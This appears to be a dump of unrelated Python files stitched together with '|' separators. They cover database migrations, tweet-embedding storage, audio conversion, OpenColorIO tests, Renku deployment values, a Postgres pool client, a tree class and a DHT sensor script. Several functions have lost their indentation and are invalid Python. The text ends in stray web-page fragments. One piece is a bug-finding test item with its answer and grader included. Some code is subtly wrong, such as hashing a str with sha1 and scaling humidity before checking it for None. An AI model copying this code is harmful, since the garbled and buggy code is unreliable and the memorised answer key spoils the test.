            end_time = time.time()
            print("total time taken this loop: ", end_time - start_time)
# Flush the final partial batch (fewer than 50 rows).
# NOTE(review): unlike the in-loop flush, the RoBERTa columns are commented
# out here, so the last partial batch is written without them — confirm
# whether that is intentional.
tweets_df = pd.DataFrame({'id': ids,
                          'table_name': table,
                          'split': split,
                          'created_at_datetime': created_at_datetime,
                          'screen_name': screen_name,
                          'bio': bio,
                          'txt': txt,
                          'txt_clean_sentences': processed,
                          'txt_clean_use': use_embeddings,
                          'use_median': use_median,
                          'use_average': use_avg
                          # 'txt_clean_roberta': roberta_embeddings,
                          # 'roberta_median': roberta_median,
                          # 'roberta_average': roberta_avg,
                          # 'txt_clean_roberta_norm': roberta_embeddings_norm,
                          # 'roberta_median_norm': roberta_median_norm,
                          # 'roberta_average_norm': roberta_avg_norm
                          })
# tweets_df['txt_clean_roberta'].apply(check_array_size)
# tweets_df['txt_clean_roberta_norm'].apply(check_array_size)
# print(tweets_df)
tweets_df.to_sql('climate_tweets', 'crate://localhost:4200', if_exists='append', index=False,
                 dtype={'created_at_datetime': DateTime,
                        'txt_clean_sentences': Object})
|
"""Add a size table
Revision ID: 8e8e52357e77
Revises: 0d1c3d81d948
Create Date: 2021-09-21 09:06:01.221871
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = '8e8e52357e77'        # this migration
down_revision = '0d1c3d81d948'   # parent migration in the chain
branch_labels = None
depends_on = None
def upgrade():
    """Create the ``size`` table: integer PK ``id``, nullable ``name`` and
    ``price`` columns."""
    # ### commands auto generated by Alembic - please adjust! ###
    op.create_table('size',
                    sa.Column('id', sa.Integer(), nullable=False),
                    sa.Column('name', sa.String(length=255), nullable=True),
                    sa.Column('price', sa.Integer(), nullable=True),
                    sa.PrimaryKeyConstraint('id')
                    )
    # ### end Alembic commands ###
def downgrade():
    """Reverse the upgrade: drop the ``size`` table."""
    # ### commands auto generated by Alembic - please adjust! ###
    op.drop_table('size')
    # ### end Alembic commands ###
|
#! /usr/bin/python
### Convert Audio for iPhone Project
import os.path
import subprocess
import shutil
def main(sound_dir='/Users/Liz/Dropbox/Projects/BoardGame/Sound'):
    """Convert every .m4a file in *sound_dir* to .caf via afconvert, deleting
    the source file after each conversion.

    Fixes over the original: ``file.replace('m4a', 'caf')`` rewrote the
    first occurrence of "m4a" anywhere in the name (breaking names like
    "m4a_song.m4a"), and ``endswith('m4a')`` also matched names without a
    dot; ``os.path.splitext`` handles the extension precisely. The directory
    is now a parameter (defaulting to the original hard-coded path).
    """
    os.chdir(sound_dir)
    for name in os.listdir(sound_dir):
        base, ext = os.path.splitext(name)
        if ext == '.m4a':
            converted = base + '.caf'
            print(converted)
            # LEI16 = little-endian 16-bit integer PCM in a CAF container.
            commandlist = ['/usr/bin/afconvert', '-f', 'caff', '-d', 'LEI16',
                           name, converted]
            subprocess.call(commandlist)
            os.remove(name)

if __name__ == '__main__':
    main()
# SPDX-License-Identifier: BSD-3-Clause
# Copyright Contributors to the OpenColorIO Project.
import unittest, os, sys
# CLI contract: argv[1] = build directory, argv[2] = 'true'/'false' for SSE
# support, optional argv[3] = build-type subdirectory (multi-config builds).
build_location = sys.argv[1]
opencolorio_sse = sys.argv[2].lower() == 'true'
opencolorio_dir = os.path.join(build_location, "src", "OpenColorIO")
pyopencolorio_dir = os.path.join(build_location, "src", "bindings", "python")

if os.name == 'nt':
    # On Windows we must append the build type to the build dirs and add the main library to PATH
    # Note: Only when compiling within Microsoft Visual Studio editor i.e. not on command line.
    if len(sys.argv) == 4:
        opencolorio_dir = os.path.join(opencolorio_dir, sys.argv[3])
        pyopencolorio_dir = os.path.join(pyopencolorio_dir, sys.argv[3])
    os.environ['PATH'] = "{0};{1}".format(opencolorio_dir, os.environ.get('PATH', ""))
elif sys.platform == 'darwin':
    # On OSX we must add the main library location to DYLD_LIBRARY_PATH
    os.environ['DYLD_LIBRARY_PATH'] = "{0}:{1}".format(opencolorio_dir, os.environ.get('DYLD_LIBRARY_PATH', ""))

# Make the freshly built Python bindings importable before anything on sys.path.
sys.path.insert(0, pyopencolorio_dir)
import PyOpenColorIO as OCIO
from MainTest import *
from ConstantsTest import *
from ConfigTest import *
from ContextTest import *
from LookTest import *
from ColorSpaceTest import *
from GpuShaderDescTest import *
from Baker import *
from TransformsTest import *
from CDLTransformTest import *
from RangeTransformTest import *
class FooTest(unittest.TestCase):
    """Placeholder case used to sanity-check the unittest wiring."""

    def test_interface(self):
        # Intentionally empty: passes as long as the harness can run it.
        pass
def suite():
    """Assemble the OpenColorIO Python binding test suite."""
    cases = (
        MainTest("test_interface"),
        ConstantsTest("test_interface"),
        ConfigTest("test_interface"),
        ConfigTest("test_is_editable"),
        ContextTest("test_interface"),
        LookTest("test_interface"),
        ColorSpaceTest("test_interface"),
        CDLTransformTest("test_interface"),
        CDLTransformTest("test_equality"),
        CDLTransformTest("test_validation"),
        RangeTransformTest("test_interface"),
        RangeTransformTest("test_equality"),
        RangeTransformTest("test_validation"),
        TransformsTest("test_interface"),
        # Processor / ProcessorMetadata: no tests wired up yet.
        GpuShaderDescTest("test_interface"),
        BakerTest("test_interface", opencolorio_sse),
        # PackedImageDesc / PlanarImageDesc: no tests wired up yet.
    )
    bundle = unittest.TestSuite()
    for case in cases:
        bundle.addTest(case)
    return bundle
if __name__ == '__main__':
    # Run the suite verbosely; a non-zero exit code signals failure to CI.
    outcome = unittest.TextTestRunner(verbosity=2).run(suite())
    sys.exit(0 if outcome.wasSuccessful() else 1)
|
#!/usr/bin/env python3
import argparse
import re
import subprocess
import sys
import ruamel.yaml
from prompt_toolkit import prompt
# Round-trip YAML handler that preserves quoting from the values template.
yaml = ruamel.yaml.YAML()
yaml.preserve_quotes = True
def merge_values(v1, v2):
    """Recursively merge *v2* into *v1* in place; existing v1 values win.

    Dict values are merged key-by-key; scalar values already present in v1
    are kept. Returns v1 for convenience.
    """
    for key, incoming in v2.items():
        if isinstance(incoming, dict):
            existing = v1.setdefault(key, {})
            if isinstance(existing, dict):
                merge_values(existing, incoming)
            # else: v1 already holds a scalar here; it takes precedence.
            # (The original crashed with AttributeError in this case, and
            # also ran a redundant second setdefault on every key.)
        else:
            v1.setdefault(key, incoming)
    return v1
def recurse_dict_secrets(d, path=""):
"""Recursively populate values."""
secret_regex = re.compile("<use \`(.*)\`>")
for k, v in d.items():
if isinstance(v, dict):
d[k] = recurse_dict_secrets(v, path="{path}.{k}".format(path=path, k=k))
else:
if isinstance(v, str):
if secret_regex.match(v):
command = secret_regex.findall(v)[0]
d[k] = subprocess.check_output(command, shell=True).decode().strip()
print("Adding secret {path}.{k}".format(path=path, k=k))
return d
def main():
    """Render a basic Renku values file.

    Prompts for any value not supplied via CLI flags, fills the template,
    auto-generates secrets, and writes the result to --output or stdout.
    Returns 0 when written to a file, None when printed.
    """
    print("----------------------------")
    print("| Configuring Renku values |")
    print("----------------------------")
    argparser = argparse.ArgumentParser(description=__doc__)
    argparser.add_argument(
        "--namespace", help="Namespace for the deployment"
    )
    argparser.add_argument("--gitlab", help="Deploy GitLab as a part of Renku",
        action=argparse.BooleanOptionalAction, default=False
    )
    argparser.add_argument("--gitlab-url", help="Gitlab URL")
    argparser.add_argument(
        "--gitlab-registry",
        help="Gitlab Image Registry URL"
    )
    argparser.add_argument("--gitlab-client-id", help="Gitlab client ID")
    argparser.add_argument(
        "--gitlab-client-secret", help="Gitlab client secret"
    )
    argparser.add_argument("--renku-domain", help="Renku domain")
    argparser.add_argument(
        "--template", help="Values template to use", default="base-renku-values.yaml.template"
    )
    argparser.add_argument(
        "--output", "-o", help="Output file"
    )
    args = argparser.parse_args()
    namespace = args.namespace or prompt("Namespace: ", default="renku")
    # we must have a renku domain
    renku_domain = args.renku_domain or prompt("Renku domain: ", default="renku.example.com")
    # check if gitlab is being deployed - if not make sure we have the client configuration
    if not args.gitlab:
        gitlab_url = (
            args.gitlab_url or prompt("GitLab URL: ")
        )
        gitlab_client_id = (
            args.gitlab_client_id or prompt("GitLab client id: ")
        )
        gitlab_client_secret = (
            args.gitlab_client_secret or prompt("GitLab client secret: ")
        )
        gitlab_registry = (
            args.gitlab_registry or prompt("Gitlab registry hostname: ", default=f"registry.{renku_domain}")
        )
        if not (gitlab_url and gitlab_client_id and gitlab_client_secret and gitlab_registry):
            raise RuntimeError(
                "If not deploying own GitLab, you must specify the GitLab URL, client id and client secret."
            )
    else:
        gitlab_url = f"https://{renku_domain}/gitlab"
        gitlab_registry = f"registry.{renku_domain}"
    # read in the template and set the values
    with open(args.template) as f:
        t = f.read().format(
            namespace=namespace,
            renku_domain=renku_domain,
            gitlab_registry=gitlab_registry,
            gitlab_url=gitlab_url
        )
    values = yaml.load(t)
    # if a key is set to '<use `openssl rand -hex 32`>' automatically generate the secret
    values = recurse_dict_secrets(values)
    if args.gitlab:
        # assumes the template already defines 'gitlab' and 'global.gitlab'
        # mappings -- TODO confirm against the template file.
        values["gitlab"]["enabled"] = True
        values["global"]["gitlab"]["urlPrefix"] = "/gitlab"
    else:
        values["global"]["gateway"]["gitlabClientId"] = gitlab_client_id
        values["global"]["gateway"]["gitlabClientSecret"] = gitlab_client_secret
        values["gitlab"] = {"enabled": False}
    warning = """
# This is an automatically generated values file to deploy Renku.
# Please scrutinize it carefully before trying to deploy.
"""
    if args.gitlab:
        warning += """
# GitLab values are incomplete; git-LFS and the registry storage are not configured.
# See the main Renku values file for reference and an example.
"""
    if args.output:
        with open(args.output, "w") as f:
            f.write(warning)
            yaml.dump(values, f)
        return 0
    print("")
    print("--------------------------")
    print("| Auto-generated values: |")
    print("--------------------------")
    print(warning)
    # BUG FIX: ruamel's YAML.dump(values, stream) writes to the stream and
    # returns None, so the original print("{}".format(yaml.dump(...)))
    # emitted a stray "None" line after the rendered YAML.
    yaml.dump(values, sys.stdout)
if __name__ == "__main__":
main()
|
def triples_sum_to_zero(l: list):
    """
    triples_sum_to_zero takes a list of integers as an input.
    it returns True if there are three distinct elements in the list that
    sum to zero, and False otherwise.
    >>> triples_sum_to_zero([1, 3, 5, 0])
    True
    >>> triples_sum_to_zero([1, 3, -2, 1])
    True
    >>> triples_sum_to_zero([1, 2, 3, 7])
    False
    >>> triples_sum_to_zero([2, 4, -5, 3, 9, 7])
    True
    >>> triples_sum_to_zero([1])
    False
    Example solution:
    # line 1
    for l1 in l:
        # line 2
        for l2 in l:
            # line 3
            for l3 in l:
                # line 4
                if l1 + l2 + l3 == 0 and l1 != l2 and l2 != l3 and l3 != l1:
                    # line 5
                    return True
    # line 6
    return False
    """
    # The faulty line is line 4: it compares element *values* rather than
    # indices, so it mishandles duplicates (e.g. [1, 3, -2, 1]).
    buggy_line = "4"
    print(buggy_line)
def check(candidate):
    """Assert that *candidate* prints exactly the digit "4" and no other digit."""
    import io
    from contextlib import redirect_stdout
    buffer = io.StringIO()
    with redirect_stdout(buffer):
        candidate([])
    printed = buffer.getvalue().strip('\n')
    assert "4" == printed
    for digit in range(0, 10):
        if digit != 4:
            assert str(digit) != printed
if __name__ == '__main__':
    # Self-check: verifies the solution above prints exactly "4".
    check(triples_sum_to_zero)
|
"""
Install and Uninstall Mongo Connector as a Linux system daemon
"""
import platform
import os
import shutil
import pathlib
import autocommand
import importlib_resources as res
def check_env():
    """Exit unless running as root on Linux (required to touch /etc and /var)."""
    system = platform.system()
    if system != "Linux":
        print("Must be running Linux")
        raise SystemExit(1)
    effective_uid = os.geteuid()
    if effective_uid > 0:
        print("Must be root user")
        raise SystemExit(2)
log_path = pathlib.Path("/var/log/mongo-connector")
init_script = pathlib.Path("/etc/init.d/mongo-connector")
config_file = pathlib.Path("/etc/mongo-connector.json")
package = "mongo_connector.service"
def install():
    """Install the log directory, config file, and System V init script.

    BUG FIX: ``init_script.dirname().makedirs_p()`` is path.py API;
    ``pathlib.Path`` has neither method, so the original raised
    AttributeError. Use ``parent.mkdir(parents=True, exist_ok=True)``.
    """
    log_path.mkdir(parents=True, exist_ok=True)
    init_script.parent.mkdir(parents=True, exist_ok=True)
    with res.path(package, "config.json") as config_src_path:
        shutil.copyfile(config_src_path, config_file)
    with res.path(package, "System V init") as init_src_path:
        shutil.copyfile(init_src_path, init_script)
def uninstall():
    """Remove everything install() created."""
    shutil.rmtree(log_path)
    for target in (config_file, init_script):
        target.unlink()
@autocommand.autocommand(__name__)
def run(command):
    # CLI entry: `command` is "install" or "uninstall", dispatched by name
    # through module globals after the root-on-Linux environment check.
    check_env()
    globals()[command]()
|
from psycopg2.pool import ThreadedConnectionPool
import psycopg2.extras
import psycopg2.sql as sql
from contextlib import contextmanager
from threading import Semaphore
from ..db.exceptions import DatabaseException
from ..utils.logs import Log
from ..constants import MIN_CONN, MAX_CONN, TIMEOUT_CONN, DEFAULT_OFFSET_LIMIT, DEFAULT_CHUNK_SIZE
from ..asserts import assertz
class SemaphoreThreadedConnectionPool(ThreadedConnectionPool):
    """ThreadedConnectionPool that blocks (instead of raising) when exhausted.

    A counting semaphore sized to ``maxconn`` makes ``getconn`` wait for a
    free slot rather than raise PoolError when all connections are in use.
    """

    def __init__(self, minconn, maxconn, *args, **kwargs):
        self._semaphore = Semaphore(maxconn)
        super().__init__(minconn, maxconn, *args, **kwargs)

    def getconn(self, *args, **kwargs):
        """Acquire a slot, then check a connection out of the pool."""
        self._semaphore.acquire()
        try:
            return super().getconn(*args, **kwargs)
        except Exception:
            # BUG FIX: if the checkout fails, release the slot; otherwise a
            # failed getconn permanently shrank the pool's usable capacity.
            self._semaphore.release()
            raise

    def putconn(self, *args, **kwargs):
        """Return a connection to the pool, then free its slot."""
        try:
            super().putconn(*args, **kwargs)
        finally:
            # Release even if putconn raises so capacity is not lost.
            self._semaphore.release()
class Client:
    """Pooled psycopg2 client: one semaphore-guarded pool per server key.

    NOTE(review): ``_instances`` and ``__conn`` are class-level attributes --
    every Client instance mutates the same ``_instances`` dict, and
    ``transaction()`` stores the active connection on the instance (shadowing
    the class default). Presumably one transaction at a time per process;
    not safe for concurrent transactions -- TODO confirm.
    """
    # Shared registry: server_key -> {'server', 'conf', 'conn_pool'}.
    _instances = {}
    # Active transaction connection (None outside transaction()).
    __conn = None

    def __init__(self, server_conf):
        # server_conf: mapping of server_key -> connection settings dict
        # (host, port, db, user, passwd, optional max_conn/timeout/schema).
        for _server_key in server_conf.keys():
            _conf = server_conf[_server_key]
            self._instances[_server_key] = {
                'server': _server_key,
                'conf': _conf
            }
            self.connect(self._instances[_server_key])

    def connect(self, instance):
        """Create a connection pool for *instance* and store it under 'conn_pool'.

        Connection failures are logged, not raised; a later _get_conn call
        fails its 'conn_pool' assertion instead.
        """
        conf = instance['conf']
        _max_conn = int(conf.get('max_conn', MAX_CONN))
        _timeout = int(conf.get('timeout', TIMEOUT_CONN))
        try:
            _conn_pool = SemaphoreThreadedConnectionPool(MIN_CONN, _max_conn, host=conf['host'], port=conf['port'],
                                                         dbname=conf['db'], user=conf['user'], password=conf['passwd'],
                                                         connect_timeout=_timeout)
            instance['conn_pool'] = _conn_pool
            Log.trace('>>> Successfully connected to POSTGRES: {}, {}:{}'.format(instance['server'],
                                                                                 conf['host'], conf['port']))
        except psycopg2.OperationalError as e:
            Log.error('>>PGSQL ERROR {} {}'.format(conf.get('server'), e))

    def query(self, server_key=None, sql=None, params=None):
        """
        Executes any given sql query
        :param sql_query:
        :return:
        """
        # NOTE(review): the `sql` parameter shadows the module-level
        # psycopg2.sql import inside this method, and `params` must be a
        # dict (params.get below) -- confirm all callers pass one.
        conn = None
        try:
            if not sql:
                raise DatabaseException("Sql cannot be empty")
            # Reuse the transaction's connection when inside transaction().
            conn = self.__conn if self.__conn is not None else self._get_conn(
                server_key)
            cursor = conn.cursor(cursor_factory=psycopg2.extras.RealDictCursor)
            schema = self._get_conf(server_key, 'schema')
            if schema:
                # NOTE(review): schema comes from server config and is
                # interpolated unparameterized -- trusted input assumed.
                cursor.execute(f"SET search_path TO {schema}")
            data = []
            chunk_size = params.get('chunk_size') or DEFAULT_CHUNK_SIZE
            offset_limit = params.get('offset_limit') or DEFAULT_OFFSET_LIMIT
            params.update({
                'chunk_size': chunk_size,
                'offset_limit': offset_limit
            })
            try:
                # Page through results chunk_size rows at a time; stop on a
                # short page, or immediately if the query has no LIMIT clause.
                while True:
                    cursor.execute(sql, params)
                    rowcount = cursor.rowcount
                    rows = cursor.fetchall()
                    data.extend(list(map(dict, rows)))
                    offset_limit += chunk_size
                    params.update({'offset_limit': offset_limit})
                    if rowcount != chunk_size or 'limit' not in sql.lower():
                        break
                if self.__conn is None:
                    # query is not using transaction
                    self.release_conn(server_key, conn)
                return data
            except KeyError as e:
                Log.error(e)
                if conn is not None:
                    # NOTE(review): inside a transaction this returns the
                    # transaction's connection to the pool early, while
                    # transaction() still holds it -- confirm intended.
                    self.release_conn(server_key, conn)
        except psycopg2.DatabaseError as e:
            Log.error(e)
            if conn is not None:
                self.release_conn(server_key, conn)
        return None

    def insert(self, db_table: str, data: dict):
        """Insert *data* (column -> value) into *db_table*.

        Must be called inside transaction(). Table and column names are
        composed with sql.Identifier, so they are safely quoted.
        """
        if not self.__conn:
            raise DatabaseException(
                "Insert must be inside a transaction block")
        columns = data.keys()
        query = sql.SQL("""insert into {} ({}) values ({})""").format(
            sql.Identifier(db_table),
            sql.SQL(', ').join(map(sql.Identifier, columns)),
            sql.SQL(', ').join(sql.Placeholder() * len(columns)))
        conn = self.__conn
        cursor = conn.cursor()
        cursor.execute(query, list(data.values()))

    def _get_conn(self, server_key):
        """
        :param server_key: database identifier
        :return: raw psycopg2 connector instance
        """
        _instance = self._instances[server_key]
        assertz('conn_pool' in _instance,
                f"getconn failed on {server_key} db", _error_code=0, _status_code=412)
        return _instance.get('conn_pool').getconn()

    def _get_conf(self, server_key, key):
        # Config lookup helper; returns None when the key is absent.
        return self._instances[server_key]['conf'].get(key, None)

    def release_conn(self, server_key, conn):
        # Return *conn* to its server's pool (frees a semaphore slot).
        _instance = self._instances[server_key]
        _instance['conn_pool'].putconn(conn)

    @contextmanager
    def transaction(self, server_key):
        """Context manager: run queries/inserts on one dedicated connection,
        roll back on database errors, commit and release on exit.

        NOTE(review): the finally block commits even after a rollback, and
        the caught exception is swallowed rather than re-raised -- confirm
        this is the intended contract.
        """
        self.__conn = self._get_conn(server_key)
        self.__conn.autocommit = False
        try:
            yield self
        except (psycopg2.DatabaseError, DatabaseException) as e:
            Log.error("rollback transaction, {}".format(e))
            self.__conn.rollback()
        finally:
            self.__conn.commit()
            self.release_conn(server_key, self.__conn)
            self.__conn = None
|
"""Add ModuleBuid.ref_build_context.
Revision ID: caeae7a4f537
Revises: 9ca1c166f426
Create Date: 2018-04-18 13:37:40.365129
"""
# revision identifiers, used by Alembic.
revision = 'caeae7a4f537'
down_revision = '9ca1c166f426'
from alembic import op
import sqlalchemy as sa
# Data migration imports
from module_build_service.common.modulemd import Modulemd
import hashlib
import json
from collections import OrderedDict
# Lightweight table stub for the data migration below: only the columns this
# migration reads/writes, not the full application model.
modulebuild = sa.Table(
    'module_builds',
    sa.MetaData(),
    sa.Column('id', sa.Integer, primary_key=True),
    sa.Column('modulemd', sa.String()),
    sa.Column('build_context', sa.String()),
    sa.Column('runtime_context', sa.String()),
)
def upgrade():
connection = op.get_bind()
with op.batch_alter_table('module_builds') as b:
b.alter_column('build_context', new_column_name='ref_build_context')
op.add_column('module_builds', sa.Column('build_context', sa.String()))
# Determine what the contexts should be based on the modulemd
for build in connection.execute(modulebuild.select()):
if not build.modulemd:
continue
try:
mmd = Modulemd.ModuleStream.read_string(build.modulemd, True)
mmd = mmd.upgrade(Modulemd.ModuleStreamVersionEnum.TWO)
except Exception:
# If the modulemd isn't parseable then skip this build
continue
mbs_xmd = mmd.get_xmd().get('mbs', {})
# Skip the non-MSE builds, so the "context" will be set default one
# in models.ModuleBuild.
if not mbs_xmd.get("mse"):
continue
# It's possible this module build was built before MBS filled out xmd or before MBS
# filled out the requires in xmd
if 'buildrequires' not in mbs_xmd:
continue
# Get the streams of buildrequires and hash it.
mmd_formatted_buildrequires = {
dep: info['stream'] for dep, info in mbs_xmd["buildrequires"].items()}
property_json = json.dumps(OrderedDict(sorted(mmd_formatted_buildrequires.items())))
context = hashlib.sha1(property_json).hexdigest()
# Update the database now
connection.execute(
modulebuild.update().where(modulebuild.c.id == build.id).values(
build_context=context))
def downgrade():
    """Drop the recomputed column and restore the original column name."""
    op.drop_column('module_builds', 'build_context')
    with op.batch_alter_table('module_builds') as batch:
        batch.alter_column('ref_build_context', new_column_name='build_context')
|
import json
import time
import sender
while True :
    time.sleep(1)
    try :
        # Importing receiver presumably opens its network connection at
        # import time (hence the OSError handling) -- TODO confirm; retry
        # once per second until it comes up.
        import receiver
        break
    except OSError :
        print("Connect Failed")
        continue
    except KeyboardInterrupt :
        break
import threading
import distributer
# Cap concurrent distributor worker threads at 5.
sem = threading.Semaphore(5)
config = json.load(open("./config.json", encoding="utf-8"))
#data : raw_msg, msg
#meta : sender/target, type
class disThread(threading.Thread):
    """Worker thread: distribute one incoming request and send the reply."""

    def __init__(self, req) :
        threading.Thread.__init__(self)
        # req: the received request to hand to the Distributer.
        self.msgrequest = req

    def run(self) :
        with sem :
            manager = distributer.Distributer(self.msgrequest)
            try :
                replydata, replymeta = manager.Distribute()
            except Exception :
                # BUG FIX: was a bare `except:`, which also swallowed
                # SystemExit/KeyboardInterrupt. Best-effort drop of messages
                # the distributer cannot handle is kept.
                return None
            # DEBUG
            print("replydata : ", end = "")
            print(replydata)
            # print("replymeta : ", end = "")
            # print(replymeta)
            # DEBUG
            talker = sender.Talker((config["IP"], config["send_port"]))
            talker.Distribute(replydata, replymeta)
print("Starting...")
while(True) :
time.sleep(0.1)
print("Heartbeat")
req = ""
try :
req = receiver.Receive() # request (dict)
if req == None :
print("NONE")
continue
except KeyboardInterrupt :
print("\nQuitting...")
break
except Exception :
print(Exception)
continue
thisThread = disThread(req)
thisThread.start()
|
import numpy as np
class Tree:
    """A simple tree stored as ``{uid: [name, description, children, parent]}``.

    Persistence format: one node per line, ``uid,name,description[,c1|c2|...]``.
    The backing file stays open until close() is called.
    """

    def __init__(self, filename):
        self.file = open("{}".format(filename))
        self.node_dict = {}
        for node in self.file.readlines():
            parameter = node.strip().split(",")
            if len(parameter) == 4:
                self.node_dict[int(parameter[0])] = [parameter[1], parameter[2], [int(x) for x in parameter[3].split("|")], None]
            elif len(parameter) == 3:
                self.node_dict[int(parameter[0])] = [parameter[1], parameter[2], [], None]
        # Resolve each node's parent from the children lists.
        for uid in self.node_dict.keys():
            for key in self.node_dict.keys():
                if uid in self.node_dict[key][2]:
                    self.node_dict[uid][3] = key

    def node(self, uid, name=None, description=None, children=None):
        """Create or update a node; omitted fields keep their current value.

        FIX: for a brand-new node the original discarded an explicitly
        passed ``children`` list; now it is honored (None still means []).
        """
        if uid in self.node_dict.keys():
            if name is None:
                name = self.node_dict[uid][0]
            if description is None:
                description = self.node_dict[uid][1]
            if children is None:
                children = self.node_dict[uid][2]
            parent = self.parent(uid)
        else:
            if children is None:
                children = []
            parent = None
        self.node_dict[uid] = [name, description, children, parent]

    def parent(self, uid):
        """Return the uid of *uid*'s parent, or None for a root node."""
        return self.node_dict[uid][3]

    def move(self, uid, new_parent):
        """Detach *uid* from its current parent and attach it under *new_parent*."""
        if self.parent(uid) is not None:
            self.node_dict[self.parent(uid)][2].remove(uid)
        self.node_dict[new_parent][2].append(uid)
        self.node_dict[uid][3] = new_parent

    def delete(self, uid):
        """Remove *uid*; its children are re-attached to its former parent.

        BUG FIXES: iterate over a *copy* of the child list (move() mutates
        the original, which made the loop skip every other child), and handle
        deleting a root node (parent is None) without a KeyError -- its
        children simply become roots.
        """
        parent = self.parent(uid)
        if parent is not None and uid in self.node_dict[parent][2]:
            self.node_dict[parent][2].remove(uid)
        for child in list(self.node_dict[uid][2]):
            if parent is not None:
                self.move(child, parent)
            else:
                self.node_dict[child][3] = None
        del self.node_dict[uid]

    def close(self, save=None):
        """Close the backing file; if *save* is given, write the tree there.

        BUG FIX: the original called ``save.writelines`` unconditionally,
        raising AttributeError whenever no save path was supplied, and never
        closed the output file it opened.
        """
        self.file.close()
        if save is None:
            return
        lines = []
        for key in self.node_dict.keys():
            line = "{},{},{}".format(key, self.node_dict[key][0], self.node_dict[key][1])
            if self.node_dict[key][2] != []:
                line += ","
                line += "|".join(str(x) for x in self.node_dict[key][2])
            lines.append(line + "\n")
        with open("{}".format(save), "w") as out:
            out.writelines(lines)
if __name__ == "__main__":
a = Tree("saves/test.save")
a.node(3,name="new_node",description="a new node")
a.move(3,1)
print(a.node_dict)
a.delete(1)
print(a.node_dict)
a.close(save="saves/other.save") |
import os
import time
import Adafruit_DHT
timestamp = time.strftime("%x") + " " + time.strftime("%X")
# Sensor settings
pin = os.environ['DHT_PIN']
sensor_type = { 'DHT11': Adafruit_DHT.DHT11,
'DHT22': Adafruit_DHT.DHT22,
'AM2302': Adafruit_DHT.AM2302 }
sensor = sensor_type[os.environ['DHT_SENSOR']]
# Try to grab a sensor reading. Use the read_retry method which will retry up
# to 15 times to get a sensor reading (waiting 2 seconds between each retry).
humidity, temperature = Adafruit_DHT.read_retry(sensor, pin)
try:
temperature = temperature * 9.0 / 5.0 + 32
except Exception:
temperature = -273.15
humidity = humidity * .01
if humidity is not None and temperature is not None:
print(timestamp, 'Temp=' + str(temperature), 'Humidity=' + str(humidity)) |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.